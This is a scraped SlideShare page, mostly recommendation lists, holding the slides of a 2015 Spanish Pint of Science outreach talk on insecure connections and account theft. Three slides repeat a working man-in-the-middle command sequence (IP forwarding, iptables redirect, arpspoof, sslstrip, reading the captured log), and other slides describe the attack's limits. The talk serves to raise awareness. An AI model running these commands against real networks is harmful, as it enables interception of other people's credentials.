Enviar búsqueda
Cargar
Pint Of Science - Donostia - San Sebastian
•
Descargar como PPSX, PDF
•
0 recomendaciones
•
354 vistas
Julián Estévez
Seguir
Man in the Middle + SSLStrip demo attack.
Leer menos
Leer más
Ciencias
Denunciar
Compartir
Denunciar
Compartir
1 de 11
Descargar ahora
Recomendados
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
Websec México, S.C.
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
Websec México, S.C.
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino Calderon
Websec México, S.C.
Practica 1 iptables
Practica 1 iptables
1 2d
Pipeline
Pipeline
Junior Sinche
Esclavizando celulares
Esclavizando celulares
PedroMesiasMejia
Presentacion Intermedia - Seguridad SIP
Presentacion Intermedia - Seguridad SIP
claudio.navarro
URLENE OWENS
URLENE OWENS
Urlene (Lynn) Owens
Recomendados
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
Websec México, S.C.
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
Websec México, S.C.
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino Calderon
Websec México, S.C.
Practica 1 iptables
Practica 1 iptables
1 2d
Pipeline
Pipeline
Junior Sinche
Esclavizando celulares
Esclavizando celulares
PedroMesiasMejia
Presentacion Intermedia - Seguridad SIP
Presentacion Intermedia - Seguridad SIP
claudio.navarro
URLENE OWENS
URLENE OWENS
Urlene (Lynn) Owens
Free UK UFO National Archives Documents
Free UK UFO National Archives Documents
alienuforesearch
Produccion y comercializacion_de_porcinos
Produccion y comercializacion_de_porcinos
wildersterling
AG Power
AG Power
Jessica Mahoney
WFA 2016 - Digital Resources to Improve your Marketing & your Life
WFA 2016 - Digital Resources to Improve your Marketing & your Life
Saffire
Executive Resume
Executive Resume
David L Robinson JR
Remembering the Customer In Contact Center Customer Service
Remembering the Customer In Contact Center Customer Service
TranseraInc
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
wcuestas
Hacking ético con herramientas Python
Hacking ético con herramientas Python
Jose Manuel Ortega Candel
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
PaloSanto Solutions
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
RootedCON
7.herramientas de redes
7.herramientas de redes
Ramiro Estigarribia Canese
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Remigio Salvador Sánchez
Hardware Hacking Rad
Hardware Hacking Rad
Svet Ivantchev
Monitorización En OpenSolaris
Monitorización En OpenSolaris
Victor M. Fernández
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
Websec México, S.C.
Multi relay
Multi relay
jselvi
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
RootedCON
Seguridad en VoIP
Seguridad en VoIP
Saúl Ibarra Corretgé
Hardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RAD
estialvarez
Uso del escaner de puertos nmap
Uso del escaner de puertos nmap
Carlos Antonio Leal Saballos
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
Hacking Bolivia
Trust No One
Trust No One
Saúl Ibarra Corretgé
Más contenido relacionado
Destacado
Free UK UFO National Archives Documents
Free UK UFO National Archives Documents
alienuforesearch
Produccion y comercializacion_de_porcinos
Produccion y comercializacion_de_porcinos
wildersterling
AG Power
AG Power
Jessica Mahoney
WFA 2016 - Digital Resources to Improve your Marketing & your Life
WFA 2016 - Digital Resources to Improve your Marketing & your Life
Saffire
Executive Resume
Executive Resume
David L Robinson JR
Remembering the Customer In Contact Center Customer Service
Remembering the Customer In Contact Center Customer Service
TranseraInc
Destacado
(6)
Free UK UFO National Archives Documents
Free UK UFO National Archives Documents
Produccion y comercializacion_de_porcinos
Produccion y comercializacion_de_porcinos
AG Power
AG Power
WFA 2016 - Digital Resources to Improve your Marketing & your Life
WFA 2016 - Digital Resources to Improve your Marketing & your Life
Executive Resume
Executive Resume
Remembering the Customer In Contact Center Customer Service
Remembering the Customer In Contact Center Customer Service
Similar a Pint Of Science - Donostia - San Sebastian
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
wcuestas
Hacking ético con herramientas Python
Hacking ético con herramientas Python
Jose Manuel Ortega Candel
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
PaloSanto Solutions
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
RootedCON
7.herramientas de redes
7.herramientas de redes
Ramiro Estigarribia Canese
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Remigio Salvador Sánchez
Hardware Hacking Rad
Hardware Hacking Rad
Svet Ivantchev
Monitorización En OpenSolaris
Monitorización En OpenSolaris
Victor M. Fernández
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
Websec México, S.C.
Multi relay
Multi relay
jselvi
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
RootedCON
Seguridad en VoIP
Seguridad en VoIP
Saúl Ibarra Corretgé
Hardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RAD
estialvarez
Uso del escaner de puertos nmap
Uso del escaner de puertos nmap
Carlos Antonio Leal Saballos
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
Hacking Bolivia
Trust No One
Trust No One
Saúl Ibarra Corretgé
Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11
spankito
Codemotion Madrid 2019 - ¡GraalVM y Micronaut: compañeros perfectos!
Codemotion Madrid 2019 - ¡GraalVM y Micronaut: compañeros perfectos!
Iván López Martín
Firewall
Firewall
pablorattin
Snortpracticas 2006
Snortpracticas 2006
Juan Antonio Gil Martínez-Abarca
Similar a Pint Of Science - Donostia - San Sebastian
(20)
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
Hacking ético con herramientas Python
Hacking ético con herramientas Python
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
7.herramientas de redes
7.herramientas de redes
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Hardware Hacking Rad
Hardware Hacking Rad
Monitorización En OpenSolaris
Monitorización En OpenSolaris
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
Multi relay
Multi relay
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
Seguridad en VoIP
Seguridad en VoIP
Hardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RAD
Uso del escaner de puertos nmap
Uso del escaner de puertos nmap
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
Trust No One
Trust No One
Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11
Codemotion Madrid 2019 - ¡GraalVM y Micronaut: compañeros perfectos!
Codemotion Madrid 2019 - ¡GraalVM y Micronaut: compañeros perfectos!
Firewall
Firewall
Snortpracticas 2006
Snortpracticas 2006
Último
Informe Aemet Tornados Sabado Santo Marchena Paradas
Informe Aemet Tornados Sabado Santo Marchena Paradas
Revista Saber Mas
SEGUNDAS VANGUARDIAS ARTÍSTICAS DEL SIGLO XX.pdf
SEGUNDAS VANGUARDIAS ARTÍSTICAS DEL SIGLO XX.pdf
PC0121
EXAMEN ANDROLOGICO O CAPACIDAD REPRODUCTIVA EN EQUINOS.pptx
EXAMEN ANDROLOGICO O CAPACIDAD REPRODUCTIVA EN EQUINOS.pptx
JhonFonseca16
HISTORIA NATURAL DE LA ENFEREMEDAD: SARAMPION
HISTORIA NATURAL DE LA ENFEREMEDAD: SARAMPION
AleMena14
López, L. - Destierro y memoria. Trayectorias de familias judías piemontesas ...
López, L. - Destierro y memoria. Trayectorias de familias judías piemontesas ...
frank0071
Sternhell & Sznajder & Asheri. - El nacimiento de la ideología fascista [ocr]...
Sternhell & Sznajder & Asheri. - El nacimiento de la ideología fascista [ocr]...
frank0071
Fowler, Will. - Santa Anna, héroe o villano [2018].pdf
Fowler, Will. - Santa Anna, héroe o villano [2018].pdf
frank0071
Sistema Endocrino, rol de los receptores hormonales, hormonas circulantes y l...
Sistema Endocrino, rol de los receptores hormonales, hormonas circulantes y l...
GloriaMeza12
RX DE TORAX normal jornadas .............
RX DE TORAX normal jornadas .............
claudiasilvera25
Sucesión de hongos en estiércol de vaca experimento
Sucesión de hongos en estiércol de vaca experimento
FriasMartnezAlanZuri
enfermedades infecciosas diarrea viral bovina presentacion umss
enfermedades infecciosas diarrea viral bovina presentacion umss
CinthyaMercado3
Generalidades de Anatomía - Ayudantía de Cátedra AHCG .pdf
Generalidades de Anatomía - Ayudantía de Cátedra AHCG .pdf
dennissotoleyva
Tema 1. Generalidades de Microbiologia Universidad de Oriente
Tema 1. Generalidades de Microbiologia Universidad de Oriente
UnaLuzParaLasNacione
Woods, Thomas E. - Cómo la Iglesia construyó la Civilización Occidental [ocr]...
Woods, Thomas E. - Cómo la Iglesia construyó la Civilización Occidental [ocr]...
frank0071
Límites derivadas e integrales y análisis matemático.pptx
Límites derivadas e integrales y análisis matemático.pptx
ErichManriqueCastill
infarto agudo al miocardio con y sin elevacion st
infarto agudo al miocardio con y sin elevacion st
JosAlbertoHernandez1
Holland, Tom - Milenio. El fin del mundo y el origen del cristianismo [2010].pdf
Holland, Tom - Milenio. El fin del mundo y el origen del cristianismo [2010].pdf
frank0071
Procedimiento e interpretación de los coprocultivos.pdf
Procedimiento e interpretación de los coprocultivos.pdf
CarlaLSarita1
Aborto Enzootico Ovino.pptx La clamidiosis ovina (aborto enzoótico de las ove...
Aborto Enzootico Ovino.pptx La clamidiosis ovina (aborto enzoótico de las ove...
JhonFonseca16
inspeccion del pescado.pdfMedicinaveteri
inspeccion del pescado.pdfMedicinaveteri
ManrriquezLujanYasbe
Último
(20)
Informe Aemet Tornados Sabado Santo Marchena Paradas
Informe Aemet Tornados Sabado Santo Marchena Paradas
SEGUNDAS VANGUARDIAS ARTÍSTICAS DEL SIGLO XX.pdf
SEGUNDAS VANGUARDIAS ARTÍSTICAS DEL SIGLO XX.pdf
EXAMEN ANDROLOGICO O CAPACIDAD REPRODUCTIVA EN EQUINOS.pptx
EXAMEN ANDROLOGICO O CAPACIDAD REPRODUCTIVA EN EQUINOS.pptx
HISTORIA NATURAL DE LA ENFEREMEDAD: SARAMPION
HISTORIA NATURAL DE LA ENFEREMEDAD: SARAMPION
López, L. - Destierro y memoria. Trayectorias de familias judías piemontesas ...
López, L. - Destierro y memoria. Trayectorias de familias judías piemontesas ...
Sternhell & Sznajder & Asheri. - El nacimiento de la ideología fascista [ocr]...
Sternhell & Sznajder & Asheri. - El nacimiento de la ideología fascista [ocr]...
Fowler, Will. - Santa Anna, héroe o villano [2018].pdf
Fowler, Will. - Santa Anna, héroe o villano [2018].pdf
Sistema Endocrino, rol de los receptores hormonales, hormonas circulantes y l...
Sistema Endocrino, rol de los receptores hormonales, hormonas circulantes y l...
RX DE TORAX normal jornadas .............
RX DE TORAX normal jornadas .............
Sucesión de hongos en estiércol de vaca experimento
Sucesión de hongos en estiércol de vaca experimento
enfermedades infecciosas diarrea viral bovina presentacion umss
enfermedades infecciosas diarrea viral bovina presentacion umss
Generalidades de Anatomía - Ayudantía de Cátedra AHCG .pdf
Generalidades de Anatomía - Ayudantía de Cátedra AHCG .pdf
Tema 1. Generalidades de Microbiologia Universidad de Oriente
Tema 1. Generalidades de Microbiologia Universidad de Oriente
Woods, Thomas E. - Cómo la Iglesia construyó la Civilización Occidental [ocr]...
Woods, Thomas E. - Cómo la Iglesia construyó la Civilización Occidental [ocr]...
Límites derivadas e integrales y análisis matemático.pptx
Límites derivadas e integrales y análisis matemático.pptx
infarto agudo al miocardio con y sin elevacion st
infarto agudo al miocardio con y sin elevacion st
Holland, Tom - Milenio. El fin del mundo y el origen del cristianismo [2010].pdf
Holland, Tom - Milenio. El fin del mundo y el origen del cristianismo [2010].pdf
Procedimiento e interpretación de los coprocultivos.pdf
Procedimiento e interpretación de los coprocultivos.pdf
Aborto Enzootico Ovino.pptx La clamidiosis ovina (aborto enzoótico de las ove...
Aborto Enzootico Ovino.pptx La clamidiosis ovina (aborto enzoótico de las ove...
inspeccion del pescado.pdfMedicinaveteri
inspeccion del pescado.pdfMedicinaveteri
Pint Of Science - Donostia - San Sebastian
1.
Conexiones inseguras y
robo de cuentas Ni Neu, 20 de mayo 2015 Julián Estévez @jeibros http://www.ideasecundaria.blogspot.com
2.
• echo 1
> /proc/sys/net/ipv4/ip_forward • iptables –t nat –A PREROUTING –p tcp --destination- port 80 –j REDIRECT --to-port 8080 • arpspoof –i <interface> -t <target IP> -r <gateway IP> • sslstrip –l 8080 • cat sslstrip.log Código
3.
Ataque MITM
4.
• echo 1
> /proc/sys/net/ipv4/ip_forward • iptables –t nat –A PREROUTING –p tcp --destination- port 80 –j REDIRECT --to-port 8080 • arpspoof –i <interface> -t <target IP> -r <gateway IP> • sslstrip –l 8080 • cat sslstrip.log Código
5.
6.
• echo 1
> /proc/sys/net/ipv4/ip_forward • iptables –t nat –A PREROUTING –p tcp --destination- port 80 –j REDIRECT --to-port 8080 • arpspoof –i <interface> -t <target IP> -r <gateway IP> • sslstrip –l 8080 • cat sslstrip.log Código
7.
Herramienta SSLSTRIP (2009)
8.
Fing App (Android)
9.
-El usuario cree
que en red WPA está seguro -HTTPS Afortunadamente… - Gmail y Facebook están protegidos frente a SSLStrip Pero… - No están seguros frente a otros ataques como SSLSplit, robo de cookie e ingeniería social
10.
No hace falta
ser un genio Kali Linux
11.
Conexiones inseguras y
robo de cuentas Ni Neu, 20 de mayo 2015 Julián Estévez @jeibros http://www.ideasecundaria.blogspot.com
Descargar ahora